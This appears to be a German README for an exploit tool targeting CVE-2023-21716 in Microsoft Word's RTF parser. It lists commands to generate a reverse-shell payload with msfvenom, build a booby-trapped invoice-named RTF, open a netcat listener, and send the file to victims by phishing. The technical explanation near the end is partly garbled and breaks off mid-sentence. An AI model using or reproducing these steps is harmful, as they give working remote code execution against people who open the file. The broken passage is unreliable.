
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
Schweregrad: Kritisch (CVSS 9.8)
Betroffen: Microsoft Word 2013 / 2016 / 2019 / 2021 (ungepatcht)
Patch: Microsoft Februar 2023 Patch Tuesday
Autor: REGGYRAIDER
CVE-2023-21716 ist eine Heap-Korruptions-Schwachstelle im RTF-Parser (wwlib.dll) von Microsoft Word.
Wenn Word eine \fonttbl-Direktive mit mehr als 32.767 Schrifteinträgen parst, läuft ein interner vorzeichenbehafteter 16-Bit-Zähler über, was die Heap-Metadaten beschädigt. Dies ermöglicht es einem Angreifer, eine Remotecodeausführung zu erreichen, indem er dem Opfer lediglich eine präparierte .rtf-Datei sendet.
Keine Makros. Keine Benutzerinteraktion über das Öffnen der Datei hinaus.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
Per SMB hochladen, E-Mail-Anhang oder einen anderen Phishing-Vektor.
Wenn das Opfer invoice_march2024.rtf in einer ungepatchten Word-Version öffnet, erhalten Sie eine Reverse-Shell.
Angreifer erstellt RTF Word parst \fonttbl Heap beschädigt
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl mit 32769+ Vorzeichenbehafteter 16-Bit- Shellcode des
Schriftdefinitionen Zähler läuft über → 0x8000 Angreifers wird ausgeführt
\f<N>-Schriftdefinitionen innerhalb von \fonttbl ein.payload.bin) wird innerhalb von \pict platziert und landet in der beschädigten Region, wo er bei der Verarbeitung durch den Allokator zur Ausführung gelangt.Dieses Werkzeug ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht.
Die Verwendung dieses Exploits gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben, ist illegal.
Der Autor übernimmt keine Verantwortung für Missbrauch.